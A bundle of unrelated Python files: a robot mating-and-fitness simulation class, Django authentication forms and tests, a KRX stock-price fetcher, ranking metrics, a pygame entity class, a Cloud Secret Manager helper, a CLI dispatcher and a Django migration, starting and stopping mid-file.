        self.conf = conf
        self.size = len(tree)
        self.battery_level = battery_level
        self.initial_charge = battery_level

    def will_mate_with(self, other):
        """
        Decides whether or not to mate with the other given robot
        based on its position and speed.
        :param other:
        :type other: Robot
        :return:
        """
        if self.age() < self.conf.warmup_time:
            # Don't mate within the warmup time
            return False
        mate_count = self.mated_with.get(other.name, 0)
        if mate_count > self.conf.max_pair_children:
            # Maximum number of children with this other parent
            # has been reached
            return False
        if self.last_mate is not None and \
           float(self.last_update - self.last_mate) < self.conf.gestation_period:
            # Don't mate within the cooldown window
            return False
        if self.distance_to(other.last_position) > self.conf.mating_distance_threshold:
            return False
        my_fitness = self.fitness()
        other_fitness = other.fitness()
        # Only mate with robots with nonzero fitness, check for self zero-fitness
        # to prevent division by zero.
        return other_fitness > 0 and (
            my_fitness == 0 or
            (other_fitness / my_fitness) >= self.conf.mating_fitness_threshold
        )

    def distance_to(self, vec, planar=True):
        """
        Calculates the Euclidean distance from this robot to
        the given vector position.
        :param vec:
        :type vec: Vector3
        :param planar: If true, only x/y coordinates are considered.
        :return:
        """
        diff = self.last_position - vec
        if planar:
            diff.z = 0
        return diff.norm()

    @staticmethod
    def header():
        """
        Column names for the CSV row produced by write_robot.
        :return:
        """
        return ['run', 'id', 't_birth', 'parent1', 'parent2', 'charge', 'nparts', 'x', 'y', 'z']

    def write_robot(self, world, details_file, csv_writer):
        """
        :param world:
        :param details_file:
        :param csv_writer:
        :return:
        """
        # Fix: SerializeToString() returns bytes, so the details file must be
        # opened in binary mode ('w' raises TypeError on Python 3). The
        # with-statement also guarantees the handle is closed.
        with open(details_file, 'wb') as f:
            f.write(self.robot.SerializeToString())
        row = [getattr(world, 'current_run', 0), self.robot.id,
               world.age()]
        row += [parent.robot.id for parent in self.parents] if self.parents else ['', '']
        row += [self.initial_charge, self.size, self.last_position.x,
                self.last_position.y, self.last_position.z]
        csv_writer.writerow(row)

    def fitness(self):
        """
        Fitness is proportional to both the displacement and absolute
        velocity of the center of mass of the robot, in the formula:
        5 dS + S
        Where dS is the displacement over a direct line between the
        start and end points of the robot, and S is the distance that
        the robot has moved.
        Since we use an active speed window, we use this formula
        in context of velocities instead.
        :return:
        """
        age = self.age()
        if age < (0.25 * self.conf.evaluation_time) or age < self.conf.warmup_time:
            # We want at least some data
            return 0.0
        return 5.0 * self.displacement_velocity() + self.velocity()

    def charge(self):
        """
        Returns the remaining battery charge of this robot.
        :return:
        """
        return self.initial_charge - (float(self.age()) * self.size)

    def did_mate_with(self, other):
        """
        Called when this robot mated with another robot successfully.
        :param other:
        :type other: Robot
        :return:
        """
        self.last_mate = self.last_update
        if other.name in self.mated_with:
            self.mated_with[other.name] += 1
        else:
            self.mated_with[other.name] = 1
|
import os
from email.mime.image import MIMEImage
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.forms import PasswordResetForm as DjangoPasswordResetForm
from django.core.mail import EmailMultiAlternatives
from django.template import loader
from django.utils.translation import gettext_lazy as _
from apps.cruncher.forms import CruncherFormRenderer
# Resolve the active user model once at import time (honours a custom AUTH_USER_MODEL).
UserModel = get_user_model()
class UserLoginForm(CruncherFormRenderer):
    """Login form that authenticates a user by e-mail and password."""

    email = forms.EmailField(
        label=_("Votre adresse e-mail"),
        required=True,
        widget=forms.EmailInput(attrs={"autofocus": True}),
    )
    password = forms.CharField(
        label=_("Mot de passe"),
        widget=forms.PasswordInput(),
        help_text='<a class="link-text" href="/password-reset/">{}</a>'.format(
            _("Perdu votre mot de passe?")
        ),
    )
    # Optional redirect target carried through the login flow.
    next = forms.CharField(required=False, widget=forms.HiddenInput())

    def clean(self):
        """Validate the credential pair (no request bound at this stage)."""
        email, password = (
            self.cleaned_data.get("email"),
            self.cleaned_data.get("password"),
        )
        user = authenticate(request=None, email=email, password=password)
        if user is None:
            self.add_error("password", _("Adresse e-mail ou mot de passe invalides"))

    def login_user(self, request):
        """
        Authenticate against `request` and log the user in if active.

        :return: the logged-in user, or None when authentication failed or
            the account is inactive.
        """
        assert self.is_bound
        email, password = (
            self.cleaned_data.get("email"),
            self.cleaned_data.get("password"),
        )
        user = authenticate(request=request, email=email, password=password)
        # authenticate() returns None on bad credentials; the original code
        # would then raise AttributeError on `user.is_active`.
        if user is not None and user.is_active:
            login(request, user)
            return user
        return None
class PasswordResetForm(CruncherFormRenderer, DjangoPasswordResetForm):
    """Password-reset form that sends a branded multi-part e-mail with an inline logo."""

    email = forms.EmailField(label=_("Votre adresse e-mail"), required=True)

    def send_mail(
        self,
        subject_template_name,
        email_template_name,
        context,
        from_email,
        to_email,
        html_email_template_name=None,
    ):
        "Send a django.core.mail.EmailMultiAlternatives to `to_email`."
        context.update(BASE_URL=settings.BASE_URL)
        subject = loader.render_to_string(subject_template_name, context)
        # Email subject *must not* contain newlines
        subject = "".join(subject.splitlines())
        body = loader.render_to_string(email_template_name, context)
        email_message = EmailMultiAlternatives(subject, body, from_email, [to_email])
        if html_email_template_name is not None:
            html_email = loader.render_to_string(html_email_template_name, context)
            email_message.attach_alternative(html_email, "text/html")
        # Inline logo referenced as cid:email-logo.png by the HTML template.
        logo_path = os.path.join(
            settings.BASE_DIR, "static", "images", "email-logo.png"
        )
        # Use a context manager; the original leaked the file handle.
        with open(logo_path, "rb") as logo_file:
            img = logo_file.read()
        logo_image = MIMEImage(img)
        logo_image.add_header("Content-ID", "<email-logo.png>")
        logo_image.add_header(
            "Content-Disposition", "inline", filename="email-logo.png"
        )
        logo_image.add_header("Content-Type", "image/png", name="email-logo.png")
        email_message.attach(logo_image)
        # "related" lets mail clients render the inline image next to the HTML part.
        email_message.mixed_subtype = "related"
        email_message.send()

    def clean_email(self):
        """Reject active social-login accounts that have no usable password."""
        email = self.cleaned_data.get("email")
        users = UserModel.objects.filter(email=email)
        if users.exists():
            user = users.first()
            if user.is_active and not user.has_usable_password():
                raise forms.ValidationError(
                    _(
                        "Un utilisateur avec cette adresse e-mail existe, "
                        "mais aucun mot de passe n'y est associé. Vous êtes-vous "
                        "inscrits en utilisant un compte Google ou Facebook? "
                        "Si c'est le cas, veuillez vous re-connecter en utilisant "
                        "la même méthode!"
                    )
                )
        return email
|
import requests
import pandas as pd
# Display formatting for pandas output.
pd.options.display.float_format = '{:,.2f}'.format
pd.set_option('mode.chained_assignment', None)

# KRX market-data endpoint shared by all queries in this module.
url = 'http://data.krx.co.kr/comm/bldAttendant/getJsonData.cmd'

# Browser-like headers; the KRX server rejects requests without them.
headers = {
    'User-Agent': 'Mozilla/5.0',
    'Origin': 'http://data.krx.co.kr',
    'Referer': 'http://data.krx.co.kr/contents/MDC/MDI/mdiLoader/index.cmd?menuId=MDC0201020201',
}

# Fetch the instrument master table (all listed issues).
data = {
    'bld': 'dbms/MDC/STAT/standard/MDCSTAT01901',
    'locale': 'ko_KR',
    'mktId': 'ALL',
    'share': '1',
    'csvxls_isNo': 'false',
}
raw = requests.post(url, headers=headers, data=data)
rst = raw.json()['OutBlock_1']
# Build the DataFrame directly from the list of record dicts. The original
# appended each record's values in a loop and then read the column names from
# the leaked loop variable `r`, which raises NameError on an empty response.
df_master = pd.DataFrame(rst)
def historical_price(symbol='000660', start_date=None, end_date=None):
    """
    Fetch daily OHLCV history for a KRX-listed symbol.

    :param symbol: short issue code (e.g. '000660')
    :param start_date: anything pandas can parse; defaults to 7 days ago
    :param end_date: anything pandas can parse; defaults to today
    :return: DataFrame indexed by Date with numeric price/volume columns
    """
    # Look up the full issue code from the master table.
    stock = df_master[df_master['ISU_SRT_CD'] == symbol]
    # Normalize the date window to the YYYYMMDD strings the API expects.
    start_date = pd.to_datetime(start_date).strftime('%Y%m%d') if start_date else (pd.Timestamp.today() - pd.DateOffset(days=7)).strftime('%Y%m%d')
    end_date = pd.to_datetime(end_date).strftime('%Y%m%d') if end_date else pd.Timestamp.today().strftime('%Y%m%d')
    print(start_date, end_date)
    data = {
        'bld': 'dbms/MDC/STAT/standard/MDCSTAT01701',
        'isuCd': '{}'.format(stock['ISU_CD'].iloc[0]),
        'strtDd': start_date,
        'endDd': end_date,
    }
    raw = requests.post(url, headers=headers, data=data)
    rst = raw.json()['output']
    # Build the frame directly from the record dicts; the original relied on
    # the loop variable leaking out of a for loop to recover column names.
    df = pd.DataFrame(rst)
    df.drop(columns=['FLUC_TP_CD', 'CMPPREVDD_PRC', 'FLUC_RT'], inplace=True)
    df.rename(columns={
        'TRD_DD': 'Date', 'TDD_OPNPRC': 'Open', 'TDD_HGPRC': 'High',
        'TDD_LWPRC': 'Low', 'TDD_CLSPRC': 'Close', 'ACC_TRDVOL': 'Volume',
        'ACC_TRDVAL': 'Value', 'MKTCAP': 'MarketCap', 'LIST_SHRS': 'Shares',
    }, inplace=True)
    df['Date'] = pd.to_datetime(df['Date'])
    # Strip thousands separators and convert each numeric column once,
    # instead of eight copy-pasted conversion lines.
    for col, dtype in [('Open', float), ('High', float), ('Low', float),
                       ('Close', float), ('Volume', int), ('Value', float),
                       ('MarketCap', float), ('Shares', int)]:
        df[col] = df[col].str.replace(',', '').astype(dtype)
    df.set_index('Date', inplace=True)
    return df
if __name__ == '__main__':
    # Smoke test: fetch the default symbol's last week of prices.
    df = historical_price()
    print(df)
from pathlib import Path

# Demonstrate two equivalent ways to read a sibling file's lines:
# the open() builtin accepts a Path, and Path has its own open() method.
source = Path(__file__).parent / "testingstuff.py"

with open(source) as handle:
    print(handle.readlines())

with source.open() as handle:
    print(handle.readlines())
# Reformat fixed-width hypocenter records: drop the first 20 columns, pad
# single-digit fields with a leading zero, and append the fixed-format tail
# expected by the downstream tool.
TAIL = '.000 1.000 000.00 0.00 -999. 0.00 T__D__\n'
NUMS = '0123456789'

# Context managers guarantee both files are closed even on error
# (the original left them open if processing raised).
with open('outputname.txt', 'r') as fin, open('outhypo.txt', 'w') as fout:
    for line in fin:
        linechange = line[20:]
        # Assumes fixed-width input records at least 31 chars long after the
        # 20-column prefix — TODO confirm input format.
        if linechange[30] == '\t':
            linechange = linechange[0:29] + '0' + linechange[29:]
        if len(linechange) > 33:
            if linechange[33] not in NUMS:
                # e.g. ' ', '\t', '\n', 'a', 'k' — pad column 32 with a zero.
                linechange = linechange[0:32] + '0' + linechange[32] + TAIL
            else:
                linechange = linechange[:34] + TAIL
        else:
            linechange = linechange[0:32] + '0' + linechange[32] + TAIL
        fout.write(linechange)
|
from django.test import TestCase
from django.utils.html import escape
from lists.models import Item, List
from lists.forms import (
DUPLICATE_ITEM_ERROR, EMPTY_ITEM_ERROR,
ExistingListItemForm, ItemForm,
)
# Create your tests here.
class HomePageTest(TestCase):
    """Tests for the site home page."""

    def test_uses_home_template(self):
        """GET / renders the home template."""
        self.assertTemplateUsed(self.client.get('/'), 'home.html')

    def test_home_page_uses_item_form(self):
        """GET / exposes an ItemForm in the template context."""
        self.assertIsInstance(self.client.get('/').context['form'], ItemForm)
class ListViewTest(TestCase):
    """Tests for the single-list detail view (/lists/<id>/)."""

    def test_uses_list_template(self):
        """The list page renders the list template."""
        list_ = List.objects.create()
        response = self.client.get(f'/lists/{list_.id}/')
        self.assertTemplateUsed(response, 'list.html')

    def test_displays_only_items_for_that_list(self):
        """Only the requested list's items are displayed, not other lists'."""
        correct_list = List.objects.create()
        Item.objects.create(text='itemey 1', list=correct_list)
        Item.objects.create(text='itemey 2', list=correct_list)
        other_list = List.objects.create()
        Item.objects.create(text='another item 1', list=other_list)
        Item.objects.create(text='another item 2', list=other_list)
        response = self.client.get(f'/lists/{correct_list.id}/')
        self.assertContains(response, 'itemey 1')
        self.assertContains(response, 'itemey 2')
        self.assertNotContains(response, 'another item 1')
        self.assertNotContains(response, 'another item 2')

    def test_passes_correct_list_to_template(self):
        """The requested list object is passed into the template context."""
        correct_list = List.objects.create()
        response = self.client.get(f'/lists/{correct_list.id}/')
        self.assertEqual(response.context['list'], correct_list)

    def test_can_save_a_POST_request_to_an_existing_list(self):
        """A POST adds the new item to the targeted existing list."""
        other_list = List.objects.create()
        correct_list = List.objects.create()
        self.client.post(
            f'/lists/{correct_list.id}/',
            data={'text': 'A new item for an existing list'}
        )
        self.assertEqual(Item.objects.count(), 1)
        new_item = Item.objects.first()
        self.assertEqual(new_item.text, 'A new item for an existing list')
        self.assertEqual(new_item.list, correct_list)

    def test_POST_redirects_to_list_view(self):
        """After a successful POST the client is redirected to the list view."""
        other_list = List.objects.create()
        correct_list = List.objects.create()
        response = self.client.post(
            f'/lists/{correct_list.id}/',
            data={'text': 'A new item for an existing list'}
        )
        self.assertRedirects(response, f'/lists/{correct_list.id}/')

    def test_displays_item_form(self):
        """The list page shows an ExistingListItemForm with a text input."""
        list_ = List.objects.create()
        response = self.client.get(f'/lists/{list_.id}/')
        self.assertIsInstance(response.context['form'], ExistingListItemForm)
        self.assertContains(response, 'name="text"')

    def post_invalid_input(self):
        """Helper: POST an empty item to a fresh list and return the response."""
        list_ = List.objects.create()
        return self.client.post(
            f'/lists/{list_.id}/',
            data={'text': ''}
        )

    def test_for_invalid_input_nothing_saved_to_db(self):
        """Invalid input: nothing is saved to the database."""
        self.post_invalid_input()
        self.assertEqual(Item.objects.count(), 0)

    def test_for_invalid_input_renders_list_template(self):
        """Invalid input: the list template is re-rendered with status 200."""
        response = self.post_invalid_input()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'list.html')

    def test_for_invalid_input_passes_form_to_template(self):
        """Invalid input: the bound form is passed back to the template."""
        response = self.post_invalid_input()
        self.assertIsInstance(response.context['form'], ExistingListItemForm)

    def test_for_invalid_input_shows_on_page(self):
        """Invalid input: the empty-item error message is shown on the page."""
        response = self.post_invalid_input()
        self.assertContains(response, escape(EMPTY_ITEM_ERROR))

    def test_duplicate_item_validation_errors_end_up_on_lists_page(self):
        """Duplicate items: the validation error is shown on the list page."""
        list1 = List.objects.create()
        item1 = Item.objects.create(list=list1, text='textey')
        response = self.client.post(
            f'/lists/{list1.id}/',
            data={'text': 'textey'}
        )
        expected_error = escape(DUPLICATE_ITEM_ERROR)
        self.assertContains(response, expected_error)
        self.assertTemplateUsed(response, 'list.html')
        self.assertEqual(Item.objects.all().count(), 1)
class NewListTest(TestCase):
    """Tests for creating a new list via POST /lists/new."""

    def test_can_save_a_POST_request(self):
        """A POST creates a single item with the submitted text."""
        self.client.post('/lists/new', data={'text': 'A new list item'})
        self.assertEqual(Item.objects.count(), 1)
        new_item = Item.objects.first()
        self.assertEqual(new_item.text, 'A new list item')

    def test_redirects_after_POST(self):
        """A successful POST redirects to the new list's page."""
        response = self.client.post('/lists/new', data={'text': 'A new list item'})
        new_list = List.objects.first()
        self.assertRedirects(response, f'/lists/{new_list.id}/')

    def test_validation_errors_are_sent_back_to_home_page_template(self):
        """Validation errors re-render the home page template."""
        response = self.client.post('/lists/new', data={'text': ''})
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'home.html')
        expected_error = escape("You can't have an empty list item")
        self.assertContains(response, expected_error)

    def test_invalid_list_items_arent_saved(self):
        """Invalid items create neither a list nor an item."""
        self.client.post('/lists/new', data={'text': ''})
        self.assertEqual(List.objects.count(), 0)
        self.assertEqual(Item.objects.count(), 0)

    def test_for_invalid_input_renders_home_template(self):
        """Invalid input: the home page is re-rendered with status 200."""
        response = self.client.post('/lists/new', data={'text': ''})
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'home.html')

    def test_validation_errors_are_shown_on_home_page(self):
        """Invalid input: the empty-item error is shown on the home page."""
        response = self.client.post('/lists/new', data={'text': ''})
        self.assertContains(response, escape(EMPTY_ITEM_ERROR))

    def test_for_invalid_input_passes_form_to_template(self):
        """Invalid input: the bound form is passed back to the template."""
        response = self.client.post('/lists/new', data={'text': ''})
        self.assertIsInstance(response.context['form'], ItemForm)
|
import numpy as np
def dcg_at_k(r, k):
    """
    Discounted cumulative gain of relevance scores `r`, truncated at rank `k`.

    Uses the exponential gain form: (2**rel - 1) / log2(rank + 1).

    :param r: relevance scores in ranked order
    :param k: cutoff rank
    :return: DCG@k as a float (0.0 when the truncated list is empty)
    """
    # np.asfarray was removed in NumPy 2.0; asarray with float dtype is the
    # documented replacement and behaves identically here.
    r = np.asarray(r, dtype=float)[:k]
    if r.size:
        return np.sum(np.subtract(np.power(2, r), 1) / np.log2(np.arange(2, r.size + 2)))
    return 0.


def ndcg_at_k(r, k):
    """
    Normalized DCG at rank `k`: DCG of `r` divided by the ideal DCG
    (the DCG of `r` sorted in decreasing relevance order).

    :param r: relevance scores in ranked order
    :param k: cutoff rank
    :return: NDCG@k in [0, 1]; 0.0 when the ideal DCG is zero
    """
    idcg = dcg_at_k(sorted(r, reverse=True), k)
    if not idcg:
        # All-zero relevance: avoid division by zero.
        return 0.
    dcg = dcg_at_k(r, k)
    return dcg / idcg
if __name__ == '__main__':
    # Smoke demo: NDCG@4 of a small ranking.
    r = [2,1,4,3,1]
    print(ndcg_at_k(r,4))
|
"""
Module containing Debug Methods and sites.
This Module should only be loaded in debug Mode.
"""
from flask.app import Flask
from . import root # noqa
from . import routes # noqa
def register_debug_routes(app: Flask):
    """Register the debug routes blueprint with the flask app."""
    if not app.config["DEBUG"]:
        # Refuse to install debug endpoints on a non-debug app.
        message = "This Module should only be loaded if DEBUG mode is active!"
        app.logger.warning(message)
        raise Warning(message)
    app.register_blueprint(root.DEBUG_BLP)
|
#!/usr/bin/python
from typing import TYPE_CHECKING
import pygame
from glm import ivec2
from pygame.surface import SurfaceType
from game.base.script import Script
from game.base.signal import Signal, SlotList
from game.constants import *
from os import path
from game.util import *
if TYPE_CHECKING:
from game.base.app import App
from game.entities.ai import AI
class Entity:
    """
    A basic component of the game scene.
    An Entity represents something that will be draw on the screen.
    """

    def __init__(self, app, scene, filename=None, **kwargs):
        """
        :param app: owning application (provides asset loading, screen, events)
        :param scene: scene this entity belongs to
        :param filename: optional sprite image to load for this entity
        :param kwargs: life, parent, particle, script, position, velocity,
            acceleration, scale, ai — all consumed; leftovers raise ValueError
        """
        # print(type(self))
        self.app: "App" = app
        self.scene = scene
        self.slot = None  # weakref
        self.slots = SlotList()
        self.scripts = Signal(lambda fn: Script(self.app, self, fn, use_input=False))
        self.life = kwargs.pop("life", None)  # particle life (length of time to exist)
        self.on_move = Signal()
        self.on_update = Signal()
        self.on_remove = Signal()
        # self.dirty = True
        self._surface = None
        self.removed = False
        self.parent = kwargs.pop("parent", None)
        # filename -> (sound, channel, slot); see play_sound()
        self.sounds = {}
        self.particle = kwargs.pop("particle", None)
        self.visible = True
        self._script_func = False
        script = kwargs.pop("script", None)
        self.script = None  # main script
        self._position = kwargs.pop("position", vec3(0))
        self.velocity = kwargs.pop("velocity", vec3(0))
        self.acceleration = kwargs.pop("acceleration", vec3(0))
        # solid means its collision-checked against other things
        # has_collision means the entity has a collision() callback
        self.has_collision = hasattr(self, "collision")
        self.solid = self.has_collision
        # if self.has_collision:
        #     print(self, 'has collision')
        # if self.solid:
        #     print(self, 'is solid')
        self.filename = filename
        if filename:
            self._surface = self.app.load_img(filename, kwargs.pop("scale", 1))
            self.collision_size = self.size = estimate_3d_size(self._surface.get_size())
        else:
            self.collision_size = self.size = vec3(0)
        self.render_size = vec3(0)
        """Should hold the size in pixel at which the entity was last rendered"""
        if hasattr(self, "event"):
            # Implementing event() opts the entity into app event dispatch.
            self.slots += app.add_event_listener(self)
        if isinstance(script, str):
            # load script from string 'scripts/' folder
            self.script = script
            self.scripts += self.script
        if callable(self):
            # use __call__ as script
            self.script = self
            self.scripts += self
        ai = kwargs.pop("ai", None)
        self.ai: "AI" = ai(self) if ai else None
        if kwargs:
            # Any unconsumed kwargs indicate a caller typo; fail loudly.
            # (Typo "kwrgs" in the original message fixed.)
            raise ValueError(
                "kwargs for Entity have not all been consumed. Left:", kwargs
            )

    def clear_scripts(self):
        """Drop all attached scripts, replacing the signal with a fresh one."""
        self.scripts = Signal(lambda fn: Script(self.app, self, fn, use_input=False))

    # def add_script(self, fn):
    #     """
    #     :param fn: add script `fn` (cls, func, or filename)
    #     """
    #     self.scripts += script
    #     return script

    def __str__(self):
        return f"{self.__class__.__name__}(pos: {self.position}, id: {id(self)})"

    # def once(self, duration, func)
    #     """
    #     A weakref version of scene.when.once.
    #     Used for safely triggering temp one-time events w/o holding the slot.
    #     """
    #     return self.scene.when.once(
    #         duration,
    #         lambda wself=weakref.ref(self): func(wself),
    #         weak=False
    #     )

    @property
    def position(self):
        return self._position

    @position.setter
    def position(self, v):
        """
        Sets position of our entity, which controls where it appears in
        our scene.

        :param v: 3 coordinates (list, tuple, vec3)
        """
        if len(v) == 2:
            print("Warning: Setting Entity position with a 2d vector.")
            print("Vector:", v)
            print("Entity:", self)
            raise ValueError
        if v is None:
            v = vec3(0)
        if v.x != v.x:
            # NaN check: NaN is the only value not equal to itself.
            raise ValueError
        self._position = vec3(*v)
        self.on_move()

    @property
    def velocity(self):
        return self._velocity

    @velocity.setter
    def velocity(self, value):
        # NaN guard: NaN != NaN would fail this assertion.
        assert value == value
        self._velocity = value

    def remove(self):
        """Disconnect this entity from its scene and all its slots (idempotent)."""
        if not self.removed:
            # for slot in self.slots:
            #     slot.disconnect()
            self.slots = []
            self.on_remove()
            if self.slot:
                # weird bug (?):
                # fail (1 pos but 2 given):
                #     self.scene.disconnect(self.slot):
                # fail: missing require pos 'slot'
                #     self.scene.disconnect()
                s = self.slot()
                if s:
                    s.disconnect()
            self.removed = True

    # def disconnect(self):
    #     self.remove()

    # NOTE: Implementing the below method automatically registers event listener
    # So it's commented out. It still works as before.
    # def event(self, event):
    #     """
    #     Handle the event if needed.
    #     :returns: True if the event was handled
    #     """
    #     return False

    def play_sound(self, filename, callback=None, *args):
        """
        Play sound with filename.
        Triggers callback when sound is done
        Forwards *args to channel.play()
        """
        # Resolve the full path first so the cache key below matches the key
        # used when the entry is stored (the original checked the bare name
        # but stored the joined path, so the restart branch never fired).
        filename = path.join(SOUNDS_DIR, filename)
        if filename in self.sounds:
            self.sounds[filename][1].stop()
            del self.sounds[filename]
        sound = self.app.load(filename, lambda: pygame.mixer.Sound(filename))
        if not sound:
            return None, None, None
        channel = pygame.mixer.find_channel()
        if not channel:
            return None, None, None
        channel.set_volume(SOUND_VOLUME)
        if callback:
            # Schedule the callback for when playback finishes. The original
            # used self.sounds[0], which always raised KeyError: the dict is
            # keyed by filename and not yet populated at this point.
            slot = self.scene.when.once(sound.get_length(), callback)
            self.slots.add(slot)
        else:
            slot = None
        self.sounds[filename] = (sound, channel, slot)
        channel.play(sound, *args)
        return sound, channel, slot

    def update(self, dt):
        """
        Advance this entity by `dt` seconds: AI, kinematics, particle life,
        scripts, and slot housekeeping.
        """
        # if len(self.slots) > 10:
        #     print(len(self.slots))
        if self.ai:
            self.ai.update(self, dt)
        if self.acceleration != vec3(0):
            self.velocity += self.acceleration * dt
        if self.velocity != vec3(0):
            self.position += self.velocity * dt
        if self.life is not None:
            self.life -= dt
            if self.life <= 0:
                # Particle expired.
                self.remove()
                return
        if self.scripts:
            self.scripts.each(lambda x, dt: x.update(dt), dt)
            # Prune finished scripts.
            self.scripts.slots = list(
                filter(lambda x: not x.get().done(), self.scripts.slots)
            )
        if self.slots:
            # Prune one-shot slots that already fired.
            self.slots._slots = list(
                filter(lambda slot: not slot.once or not slot.count, self.slots._slots)
            )
        self.on_update(dt)

    def render(
        self, camera, surf=None, pos=None, scale=True, fade=True, cull=False, big=False
    ):
        """
        Tries to renders surface `surf` from camera perspective
        If `surf` is not provided, render self._surface (loaded from filename)
        """
        if not self.visible:
            return
        if not pos:
            pos = self.position
        pp = self.scene.player.position if self.scene.player else vec4(0)
        if cull:
            # Remove entities far outside the player's x range.
            if pos.x < pp.x - 1000 or pos.x > pp.x + 1000:
                self.remove()
                return
        surf: SurfaceType = surf or self._surface
        if not surf:
            self.render_size = None
            return
        half_diag = vec3(-surf.get_width(), surf.get_height(), 0) / 2
        world_half_diag = camera.rel_to_world(half_diag) - camera.position
        pos_tl = camera.world_to_screen(pos + world_half_diag)
        pos_bl = camera.world_to_screen(pos - world_half_diag)
        if None in (pos_tl, pos_bl):
            # behind the camera
            self.scene.remove(self)
            return
        size = ivec2(pos_bl.xy - pos_tl.xy)
        self.render_size = size
        if not scale or 400 > size.x > 0 or big:
            if scale:
                # print(ivec2(size))
                surf = pygame.transform.scale(surf, ivec2(size))
            # don't fade close sprites
            far = abs(pos.z - pp.z) > 1000
            if fade and far:
                max_fade_dist = camera.screen_dist * FULL_FOG_DISTANCE
                alpha = surf_fader(max_fade_dist, camera.distance(pos))
                # If fade is integer make it bright faster
                alpha = clamp(int(alpha * fade), 0, 255)
                if surf.get_flags() & pygame.SRCALPHA:
                    surf.fill((255, 255, 255, alpha), None, pygame.BLEND_RGBA_MULT)
                else:
                    surf.set_alpha(alpha)
                    surf.set_colorkey(0)
            # if not far:
            #     if not 'Rain' in str(self) and not 'Rock' in str(self):
            #         print('skipped fade', self)
            self.app.screen.blit(surf, ivec2(pos_tl))
        # if size.x > 150:
        #     self.scene.remove(self)

    # def __del__(self):
    #     for slot in self.slots:
    #         slot.disconnect()

    # NOTE: Implementing the below method automatically sets up Script
    # def __call__(self):
    #     pass

    # NOTE: Implementing the below method automatically sets up collisions.
    # def collision(self, other, dt):
    #     pass
|
'''
imputationflask.secrets
-------------------
Gets secrets from google cloud secret manager. Relies on proper IAM
'''
from google.cloud import secretmanager
def csrf_key(config):
    """
    Fetch the CSRF secret key from Google Cloud Secret Manager.

    Relies on the runtime service account having secret-accessor IAM on the
    configured secret.

    :param config: mapping with 'PROJECT_NAME' and 'CSRF_KEY_SECRET_ID' keys
    :return: the latest secret payload decoded as UTF-8
    """
    client = secretmanager.SecretManagerServiceClient()
    secret_name = client.secret_version_path(
        config['PROJECT_NAME'],
        config['CSRF_KEY_SECRET_ID'],
        'latest',
    )
    payload = client.access_secret_version(secret_name).payload
    return payload.data.decode('UTF-8')
|
########################
####### BRIDGE #########
########################
# This acts as a bridge between the services and the launcher for the application
import argparse as arg
import sys
from . import logo
from . import recommendation
from . import index_data
from . import searchp
from . import preprocess
from . import meme_generator
from . import tests
# Top-level CLI wiring: print the logo / usage hints, then build the shared
# argument parser whose parsed result drives cli() below.
if len(sys.argv)==1:
    logo.print_logo()
    print("Please refer to help section using openmemes --help / openmemes -h")
elif sys.argv[1] == '-h' or sys.argv[1] == '--help':
    # Show the logo before argparse prints its own help text.
    logo.print_logo()

parser = arg.ArgumentParser('bridge')
# Options for bridge #
parser.add_argument('--recommend', default=0, help='Generate recommendations')
parser.add_argument('--search', default=0, help='Search a photo')
parser.add_argument('--preprocess', default=0, help='Preprocessing Data')
parser.add_argument('--generate', default=0, help="Meme Generation service " )
parser.add_argument('--meme', type=str, default=None, help='Enter Image path or name for the meme')
## Indexing Services ##
parser.add_argument('--force_index', type=int, default=0, help="Enter 1 to force indexing")
## Searching Services ##
parser.add_argument('--mode', default=0, help='Choose from two modes: 0-Command line 1-Interactive (searchp) | 0-Command line 1-Interactive 2-URL (meme_generator)')
parser.add_argument('--search_str', type=str, default=None, help='Enter search string: ')
parser.add_argument('--index_search', type=int, default=0, help='Choose 1 to enable searching images from their indices ')
parser.add_argument('--search_idx', default=0, help='Enter image index: ')
parser.add_argument('--result', type=int, default=0, help='Enter number of images to display: ')
parser.add_argument('--display_info', default=0, help='Enter result format 0-image(default) 1-text description: ')
## Preporcessing Services ##
parser.add_argument('--data', type=str, help='Enter image path (use with preprocess)',default='data')
parser.add_argument('--width', type=int, help='Enter width of image (use with preprocess)',default=600)
## Meme_generator Services ##
parser.add_argument('--url1', default=None, help='Enter URL for first image')
parser.add_argument('--url2', default=None, help='Enter URL for second image')
parser.add_argument('--format', default=None, help='Enter the format type')
parser.add_argument('--image1', type=str, default=None, help='Enter the image path for 1st image')
parser.add_argument('--image2', type=str, default=None, help='Enter the image path for 2nd image')
parser.add_argument('--text1', type=str, default=None, help='Enter text1')
parser.add_argument('--text2', type=str, default=None, help='Enter text2')
parser.add_argument('--random', type=str, default=None, help='Enter either True or False required for format-0')
## Test Services ##
parser.add_argument('--test',type=int, default=0, help='Set this to 1 for running a diagnostic')
parser.add_argument('--module', type=str, default=None, help='Enter module to run test')
# Parsed once at import; cli() reads this module-level namespace.
args = parser.parse_args()
# This is the endpoint for setup to work and communicate to services
def cli():
    """Entry point for setup scripts: dispatch requested services from CLI flags.

    Services run in a fixed order; several may be requested in one invocation.
    """
    dispatch = (
        (args.recommend, lambda: recommendation.start(args.meme)),
        (args.force_index, lambda: index_data.start(args.force_index)),
        (args.search, lambda: searchp.start(args)),
        (args.preprocess, lambda: preprocess.start(args)),
        (args.generate, lambda: meme_generator.start(args)),
        (args.test, lambda: tests.start(args)),
    )
    for enabled, run in dispatch:
        if enabled:
            run()
|
# Generated by Django 3.0.6 on 2020-06-02 19:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Lost.image nullable (upload_to left empty)."""

    dependencies = [
        ('LaF', '0011_auto_20200603_0026'),
    ]

    operations = [
        migrations.AlterField(
            model_name='lost',
            name='image',
            # null=True lets existing Lost rows exist without an image file.
            field=models.ImageField(null=True, upload_to=''),
        ),
    ]
|
#!/usr/bin/python
# # -*- coding: utf8 -*-
import re
# reading and decoding input files
#textFile = ["/home/darya/work/lingvo_data/sample2.txt"]
textFile = ["/home/darya/work/lingvo_data/Rasshifrovki_125-147.txt",
            "/home/darya/work/lingvo_data/Rasshifrovki_do_I99.txt",
            "/home/darya/work/lingvo_data/Rasshifrovki_I100-124.txt"]
# Tab-separated mapping of informant id -> psychological type.
psychFile = "/home/darya/work/lingvo_data/PsyType.txt"
# Replica filter pattern used by repFilter() (Russian phrase "eto samoe...").
mask = u".*эт.?.? сам.*"

# create dictionaries (module-level accumulators filled by readInfWords()
